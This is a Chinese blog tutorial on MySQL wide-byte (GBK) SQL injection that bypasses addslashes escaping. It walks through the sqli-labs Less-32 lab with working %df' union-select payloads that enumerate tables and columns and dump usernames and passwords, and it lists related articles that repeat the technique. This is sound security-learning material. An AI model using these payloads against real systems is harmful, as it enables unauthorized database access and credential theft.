MySQL 宽字节注入

最新推荐文章于 2024-01-31 08:00:00 发布
最新推荐文章于 2024-01-31 08:00:00 发布
阅读量854 收藏 2
点赞数 1
分类专栏: 信息安全 Web安全 渗透测试学习 文章标签: mysql php 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m_de_g/article/details/121869671
版权

MySQL 宽字节注入

1.宽字节诸如基础

GBK占用两字节
ASCII占用一字节
PHP中编码为GBK,函数执行添加的是ASCII编码,MySQL默认字符集是GBK等宽字节字符集。

%DF':会被PHP当中的addslashes函数转义为"%DF","“既URL里的“%5C”,那也就是说,“%DF”会被转成“%DF%5C%27”倘若网站的字符集是GBK,MySQL使用的编码也是GBK的话,就会认为“%DF%5C%27”是一个宽字节。也就是”運'"
URL在线解密工具链接:
http://tool.chinaz.com/tools/urlencode.aspx
在这里插入图片描述

2.宽字节注入代码分析

在这里插入图片描述

addslashes()函数定义和用法

addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。

预定义字符是:

单引号(')
双引号(")
反斜杠(\)
NULL

提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。

注释:默认地,PHP 对所有的 GETPOSTCOOKIE 数据自动运行 addslashes()。所以您不应对已转义过的字符串使用 addslashes(),因为这样会导致双层转义。遇到这种情况时可以使用函数 get_magic_quotes_gpc() 进行检测。

3.宽字节SQL注入实战化

sqli-labs-less32为例
1.使用1'进行探测,报错
在这里插入图片描述
2.发现单引号被转义,使用%df'进行探测
在这里插入图片描述
3.使用--+将其后面的内容注释

?id=1%df'--+

在这里插入图片描述

4.使用union注入,判断注入点

?id=-1%df' union select 1,2,3--+

在这里插入图片描述

5.获取数据库信息

?id=-1%df' union select 1,database(),3--+

在这里插入图片描述
6.知道数据库为security,获取表名信息

?id=-1%df' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

在这里插入图片描述

7.知道数据库为security,使用的表名为users,爆破字段名,因为过滤了单引号,这里采用字符串转十六进制编码绕过
编码转换网站:https://www.sojson.com/hexadecimal.html
在这里插入图片描述

?id=-1%df' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273),3--+

在这里插入图片描述
获取字段信息内容

?id=-1%df' union select 1,(select group_concat(id,username,password) from users),3--+

在这里插入图片描述
山川绿水
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql sql宽字节注入_Mysql宽字节注入(转)
weixin_34550241的博客
01-18 89
尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型。也有一些cms为了考虑老用户,所以出了gbk和utf-8两个版本。我们就以gbk字符编码为示范,拉开帷幕。gbk是一种多字符编码,具体定义自行百度。但有一个地方尤其要注意...
宽字节SQL注入
SheXinK’s Blog
12-19 187
宽字节SQL注入1、 SQL注入介绍2、 宽字节注入PHP代码3、 宽字节注入测试4、 代码漏洞修复 1、 SQL注入介绍   SQL注入介绍:SQL注入介绍   注入产生原因:web应用程序对用户输入数据的合法性没有判断或过滤不严,导致恶意payload直接带入SQL语句执行,从而执行payload中非法操作! 2、 宽字节注入PHP代码   新建PHP文件,将下面代码复制到PHP文件中,在浏览...
mysql宽字节注入
m0_65096687的博客
04-09 165
宽字节注入的核心就是传一个字符是反斜杠成为有个汉字。在查表名的时候,会出现databse='表名'两个编码可能是两个字节,也有可能是有个字节。数据库使用GBK编码可能存在宽字节注入。因为魔术引号,遇到单引号就会加反斜杠转义。如果注入方式使post,就无法修改了。%df和\可以组成一个汉字,运。告诉系统这是16进制,而不是数字。,就会变成一个这样的字符串。直接把表名编译为16进制。需要让别人知道这是16进制。因为有了魔术引号的防御。MySQL支持16进制。但是16进制是一窜数字。汉字变成ascii数字。
宽字节注入讲解
weixin_41489908的博客
09-09 5167
我讨厌现在的自己,一边压抑着自己的情绪,一边装作没事的样子,一到深夜就彻底崩溃了,天亮后还要微笑面对生活。。。 ---- 网易云热评 一、原理 1、单字节字符集: 所有的字符都使用一个字节来表示,比如 ASCII 编码(0-127) 2、多字节字符集: 在多字节字符集中,一部分字节用多个字节来表示,另一部分(可能没有)用单个字节来表示。 3、宽字节注入是利用mysql的一个特性,使用GBK编码的时候,会认为两个字符是一个汉字 二、addslashes()函数 1、addslashes(..
mysql宽字节数_Mysql宽字节注入 · BlBana’s BlackHouse
weixin_39564831的博客
02-08 109
字符集简介GBK是一种多字符的编码,通常来说,一个gbk编码汉字,占用2个字节。一个utf-8编码的汉字,占用3个字节。当将页面编码保存为gbk时输出2,utf-8时输出3。除了gbk以外,所有ANSI编码都是2个字节。现在我们来研究一下SQL注入中,字符编码带来的问题。开始测试0x01 Mysql宽字节注入实例代码如下:1234567891011121314151617181920212223...
MySQL注入 -- 宽字节注入
weixin_41489908的博客
05-21 1788
​很多事情,原来努力了,也得不到满意的结果。。。 ---- 网易云热评 一、宽字节注入介绍 1、在注入点输入(')会被转义为(\')编码后为(%5c%27),只有把斜杆去掉才能注入 2、GBK编码表,%DF%5C正好组成(運),所以会把\"吃掉",0X81-0XFE都可以 二、实例演示 1、获取数据库名称 http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,database() --+ ...
渗透测试-SQL注入之宽字节注入
lza20001103的博客
04-20 8517
渗透测试-SQL注入之宽字节注入
【SQL注入漏洞-09】宽字节注入靶场实战
cc
02-07 5639
如果数据库使用的是DBK编码,而PHP使用的是UTF-8编码 ,那这样就可能出现注入问题。原因是程序员为了防止SQL注入,就会调用addslashes转移函数,将单引号或双引号进行转义操作,转义无非便是在单或双引号前加上转义字符(\)进行转义 ,但这样并非安全,因为数据库使用的是宽字节编码,两个连在一起的字符会被当做是一个汉字,而在PHP使用的UTF-8编码则认为是两个独立的字符,如果我们在单或双引号前添加一个字符,使其和转义字符(\)组合被当作一个汉字,从而保留单或双引号,成功进行宽字节注入
SQL注入:宽字节注入
最新发布
qq_68163788的博客
01-31 1783
宽字节注入中,攻击者利用数据库编码中的特性,通常是双字节字符编码(如GB2312、GBK等),来绕过应用程序对输入进行的过滤。攻击者可以通过在输入中插入特定的编码字符来修改SQL查询的语义,从而执行恶意操作。这种技术通常用于绕过应用程序对单字节字符的过滤,使得攻击者能够成功注入恶意SQL代码。 举个例子,假设应用程序在处理用户输入时没有正确过滤并且使用了双字节字符编码。攻击者可以在输入中插入特定的双字节字符,使得SQL查询被修改,从而绕过认证、获取敏感数据或者修改数据库内容。
【每天学习一点新知识】跟咩咩一起学“宽字节注入
RexHa的博客
10-19 2005
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节,也就是只有两字节英文默认占一个字节,中文占两个字节。
(一)SQL注入
weixin_43047908的博客
03-21 571
SQL注入的分类 Boolean盲注 Boolean型的注入意思就是页面返回的结果是Boolean型的,通过构造SQL判断语句,查看页面的返回结果是否报错,页面返回是否正常等来判断哪些SQL判断条件时成立的,通过此来获取数据库中的数据。 id=1’ and length(database())>=8–+ Union注入 当应用程序容易受到 SQL 注入攻击,并且查询结果在应用程序的响应中返回时,可使用 UNION 关键字从数据库的其他表检索数据。这就导致了 UNION 注入攻击。 SELECT a,
sql注释符注入防御_SQL注入防御绕过的一些沉淀
weixin_39620535的博客
12-20 276
一、宽字节注入1、什么是宽字节GB2312、GBK、GB18030、BIG5等这些都是常说的宽字节,实际为两字节2、宽字节注入原理防御:将 ' 转换为 \'绕过:将 \ 消灭mysql在使用GBK编码的时候,会认为两个字符为一个汉字\ 编码为 %5c' 编码为%27%df%5c mysql会认为是一个汉字构造:%df' %df\' %df%5c%27 其中%df%5c将成为一个汉字专为 ...
MySQL宽字节注入漏洞分析
HelloWeb2014的博客
03-07 8083
MySQL宽字节注入漏洞分析 By HelloWeb 2017-3-7 MySQL宽字节注入漏洞是SQL注入漏洞攻防技术相互促进的一个典型例子。 1 经典SQL注入漏洞 例子1是没有任何SQL注入防护措施的PHP程序,它存在SQL注入漏洞。 <?php $name=$_GET['name']; $conn=mysql_connect('localhost','root','roo
MYSQL 宽字节注入
AaronLuo
09-14 400
MYSQL使用了GBK编码会认为两个字符为一个汉字,所以可以使用一些字符和转义过后多出来的\组合两个字符,使得数据库不识别字符,对单引号、双引号的转义失败 宽字节注入的形成过程 当PHP连接MYSQL时,当设置character_set_client = gbk 时会导致GBK编码转换的问题,当注入的参数里带有%df(%bf)时,在魔术引号开关或者addslashes() 函数的作用下,会将%df...
MYSQL注入-宽字节注入
告白的博客
08-02 432
0x00 宽字节注入简介 什么是宽字节: GB2312、GBK、GB18030、BIG5、Shift_JIS这些编码类型都是属于宽字节,当我们输入的单个字符被转换成ACSII码,当两个ACSII码组合起来会被宽字节再次编码为特殊文字等类型,即绕过了检验。宽字节注入mysql特有的一种诸注入类型 0x01 宽字节注入案例-SQLI-less-32 尝试判断闭合,发现输入的参数都被转换为ACSII码, 发现单引号被转换为通过查询ACSII码 单引号转换 /’ 而/‘换成 5c27 查询到
宽字节(宽字符)注入
Yatere的天平秤
04-24 2014
宽字节注入也是在最近的项目中发现的问题,大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠/,变成了 %df/’,其中/的十六进制是 %5C ,那么现在 %df/’ = %df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MYSQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗’,也就是说:%df/’ = %df%5c%27=縗’,有了单引号就好注入了。比如:$conn = mysql_connect(”localho
SQL注入教程——(四)宽字节注入
热门推荐
hijack89的博客
07-27 2万+
前言在mysql中,用于转义(即在字符串中的符号前加上”\”)的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。涉及到的基本概念 字符、字符集 字符(character)是组成字符集(character set)的基本单位。对字符赋予一个数值(en
(学习)SQL注入--宽字节注入
Huang921的博客
11-21 3866
SQL注入–宽字节注入实践
MYSQL注入之宽字节注入
cj_Hydra's Blog
04-16 457
一、经典sql注入漏洞 当前例子1中并没有对$_GET[‘name’]的值进行过滤,所以是存在sql注入漏洞的。 <?php $name=$_GET['name']; $conn=mysql_connect('localhost','root','root'); if($conn==null){exit("connect error !<br>");} mysql...
sqlmap 宽字节注入
07-28
SQL注入是一种常见的Web应用程序漏洞,而宽字节注入则是一种特定类型的SQL注入攻击技术。宽字节注入是利用数据库在处理字符时的特殊行为来实现的。 在某些数据库中,当处理特定字符时,会将其后的字符当作编码为UTF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值